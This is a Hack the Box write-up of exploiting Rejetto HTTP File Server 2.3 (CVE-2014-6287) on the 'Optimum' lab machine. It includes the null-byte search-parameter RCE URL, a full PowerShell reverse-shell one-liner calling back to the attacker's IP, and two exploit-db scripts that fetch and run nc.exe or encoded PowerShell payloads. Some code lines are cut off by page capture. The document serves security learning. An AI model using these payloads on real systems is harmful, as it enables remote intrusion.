

Cybersecurity-Notes/Writeups/Hack the Box/Boxes/Optimum/10 - Website.md at c875b0f52df7d2c7a870e75e1f0c2679d417931d · Twigonometry/Cybersecurity-Notes · GitHub - 02/11/2024 17:58 https://github.com/Twigonometry/Cybersecurity-Notes/b1652df7d2c7a870e75e1f0c2679d417931d/Writeups/Hack%20the%20Box/Boxes/Optimum/10%20-%20Website.md

```
Starting Point.md

To Add.md

Useful Resources.md
```

```
try:
    http = urllib3.PoolManager()
    url = f'http://{sys.argv[1]}:{sys.argv[2]}/?search=%00{{.+exec|{
        print(url)
        response = http.request('GET', url)

except Exception as ex:
    print("Usage: python3 HttpFileServer_2.3.x_rce.py RHOST RPORT coll
    print(ex)
```

Running it ouputs a URL. It seems to be a null-byte vulnerability in the search field

```
Copied to: /home/mac/Documents/HTB/optimum]

-$ searchsploit -m windows/webapps/49125.py
Copied to: /home/mac/Documents/HTB/optimum/49125.py
---(mac%kali)-[~/Documents/HTB/optimum]
-$ mv 49125.py HttpFileServerRCE.py
---(mac%kali)-[~/Documents/HTB/optimum]
-$ python3 HttpFileServerRCE.py 10.10.10.8 80 whoami
http://10.10.10.8:80/?search=%00{.+exec | whoami.}
```

Visiting the URL doesn't output the result anywhere: ![[Pasted image 20210613111557.png]]

We might have to jump straight to a powershell reverse shell. If we knew the directory of the webserver we could do a staged payload (it might be <code>c:\inetpub\wwwroot</code> but we can't know for sure, and it doesn't seem to be IIS)

I tried this to try and get a shell:

```
10.10.10.8/?search=%00{.+exec|powershell -nop -c "$client = New-Object
System.Net.Sockets.TCPClient('10.10.16.211',413);$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0,
$bytes.Length)) -ne 0){;$data = (New-Object -TypeName
System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1
| Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + ' > ';$sendbyte =
([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()".}
```

But no result. I checked if I could connect out to my box, but this also didn't work:

```
10.10.10.8/?search=%00{.+exec|ping -n 1 10.10.16.211.}
```

An alternate searchsploit term yielded more reuslts:

```
Q
  −(mac⊛kali)-[~/Documents/HTB/optimum]
L-$ searchsploit hfs
 Exploit Title
Apple Mac OSX 10.4.8 - DMG HFS+ DO_HFS_TRUNCATE Denial of Service
Apple Mac OSX 10.6 - HFS FileSystem (Denial of Service)
Apple Mac OSX 10.6.x - HFS Subsystem Information Disclosure
Apple Mac OSX xnu 1228.x - 'hfs-fcntl' Kernel Privilege Escalation
FHFS - FTP/HTTP File Server 2.1.2 Remote Command Execution
HFS (HTTP File Server) 2.3.x - Remote Command Execution (3)
HFS Http File Server 2.3m Build 300 - Buffer Overflow (PoC)
Linux Kernel 2.6.x - SquashFS Double-Free Denial of Service
Rejetto HTTP File Server (HFS) - Remote Command Execution (Metasploit)
Rejetto HTTP File Server (HFS) 1.5/2.x - Multiple Vulnerabilities
Rejetto HTTP File Server (HFS) 2.2/2.3 - Arbitrary File Upload
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1)
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2)
Rejetto HTTP File Server (HFS) 2.3a/2.3b/2.3c - Remote Command Execution
Shellcodes: No Results
Papers: No Results
```

I found this article useful for discerning which of these might be along the right path: <a href="https://dmcxblue.gitbook.io/red-team-notes-2-0/red-team-techniques/initial-access/t1190-exploit-public-facing-applications/rejetto-http-file-server-hfs-2.3">https://dmcxblue.gitbook.io/red-team-notes-2-0/red-team-techniques/initial-access/t1190-exploit-public-facing-applications/rejetto-http-file-server-hfs-2.3</a>

I tried one of the alternative exploits:

![[Pasted image 20210613113210.png]]

But I wasn't getting anything on any of my listeners:

![[Pasted image 20210613112857.png]]

![[Pasted image 20210613112915.png]]

![[Pasted image 20210613113227.png]]

Then I tried exploit number three: https://www.exploit-db.com/exploits/39161

```
Q
#!/usr/bin/python
# Exploit Title: HttpFileServer 2.3.x Remote Command Execution
# Google Dork: intext: "httpfileserver 2.3"
# Date: 04-01-2016
# Remote: Yes
# Exploit Author: Avinash Kumar Thapa aka "-Acid"
# Vendor Homepage: http://rejetto.com/
# Software Link: http://sourceforge.net/projects/hfs/
# Version: 2.3.x
# Tested on: Windows Server 2008 , Windows 8, Windows 7
# CVE : CVE-2014-6287
# Description: You can use HFS (HTTP File Server) to send and receive fi
               It's different from classic file sharing because it uses
               It also differs from classic web servers because it's ver
#Usage : python Exploit.py <Target IP address> <Target Port Number>
#EDB Note: You need to be using a web server hosting netcat (http://<att
           You may need to run it multiple times for success!
import urllib2
import sys
try:
        def script_create():
                urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/
        def execute_script():
                urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/
        def nc_run():
                urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/
        ip_addr = "192.168.44.128" #local IP address
        local port = "443" # Local Port number
        vbs = "C:\Users\Public\script.vbs|dim%20xHttp%3A%20Set%20xHttp%2
        save= "save|" + vbs
        vbs2 = "cscript.exe%20C%3A%5CUsers%5CPublic%5Cscript.vbs"
        exe= "exec|"+vbs2
        vbs3 = "C%3A%5CUsers%5CPublic%5Cnc.exe%20-e%20cmd.exe%20"+ip_add
        exe1= "exec|"+vbs3
        script_create()
        execute_script()
        nc_run()
except:
        print """[.]Something went wrong..!
        Usage is :[.] python exploit.py <Target IP address> <Target Por
        Don't forgot to change the Local IP address and Port number on t
```

This looked more promising as it had an actual payload. I changed the IP and port, and ran it.

```
r—(mac⊛kali)-[~/Documents/HTB/optimum]

L—$ python2 39161.py 10.10.10.8 80
```

I didn't immediately get a hit.

Looking at my other listener, it now had some ICMP requests in it:

![[Pasted image 20210613113907.png]]

This is strange - I guess they took a while to come through. But it means we did have code execution when we tried earlier - just no shell.

After a wait, the 39161.py exploit also eventually executed, requesting the nc.exe file:

![[Pasted image 20210613115437.png]]

I'd already moved onto the next exploit when I noticed this, but I would eventually [[15 - Shell as kostas#Getting a Better Shell|fix it]] in the final stage of priv esc.

I should have been a little more patient and then I may have been able to debug that I needed to host nc.exe, but the next exploit I tried was much easier to read and understand anyway.

## Working HFS Exploit

I tried another: https://www.exploit-db.com/exploits/49584

```
# Exploit Title: HFS (HTTP File Server) 2.3.x - Remote Command Execution \Box
# Google Dork: intext: "httpfileserver 2.3"
# Date: 20/02/2021
# Exploit Author: Pergyz
# Vendor Homepage: http://www.rejetto.com/hfs/
# Software Link: https://sourceforge.net/projects/hfs/
# Version: 2.3.x
# Tested on: Microsoft Windows Server 2012 R2 Standard
# CVE : CVE-2014-6287
# Reference: https://www.rejetto.com/wiki/index.php/HFS:_scripting_comma
#!/usr/bin/python3
import base64
import os
import urllib.request
import urllib.parse
lhost = "10.10.16.211"
lport = 413
rhost = "10.10.10.8"
rport = 80
# Define the command to be written to a file
command = f'$client = New-Object System.Net.Sockets.TCPClient("{lhost}",
# Encode the command in base64 format
encoded_command = base64.b64encode(command.encode("utf-16le")).decode()
print("\nEncoded the command in base64 format...")
# Define the payload to be included in the URL
payload = f'exec|powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInte
# Encode the payload and send a HTTP GET request
encoded_payload = urllib.parse.quote_plus(payload)
url = f'http://{rhost}:{rport}/?search=%00{{.{encoded_payload}.}}'
urllib.request.urlopen(url)
print("\nEncoded the payload and sent a HTTP GET request to the target..
# Print some information
print("\nPrinting some information for debugging...")
print("lhost: ", lhost)
print("lport: ", lport)
print("rhost: ", rhost)
```

Cybersecurity-Notes/Writeups/Hack the Box/Boxes/Optimum/10 - Website.md at c875b0f52df7d2c7a870e75e1f0c2679d417931d · Twigonometry/Cybersecurity-Notes · GitHub - 02/11/2024 17:58 https://github.com/Twigonometry/Cybersecurity-Notes/blob/c875b0f52df7d2c7a870e75e1f0c2679d417931d/Writeups/Hack%20the%20Box/Boxes/Optimum/10%20-%20Website.md

```
print("rport: ", rport)
print("payload: ", payload)

# Listen for connections
print("\nListening for connection...")
os.system(f'nc -nlvp {lport}')
```

It seems this one starts a listener for us. I had to run it with root permissions to get it to bind to port 413 - but then I got a shell!

![[Pasted image 20210613114847.png]]

And grabbed user.txt.txt:

![[Pasted image 20210613115128.png]]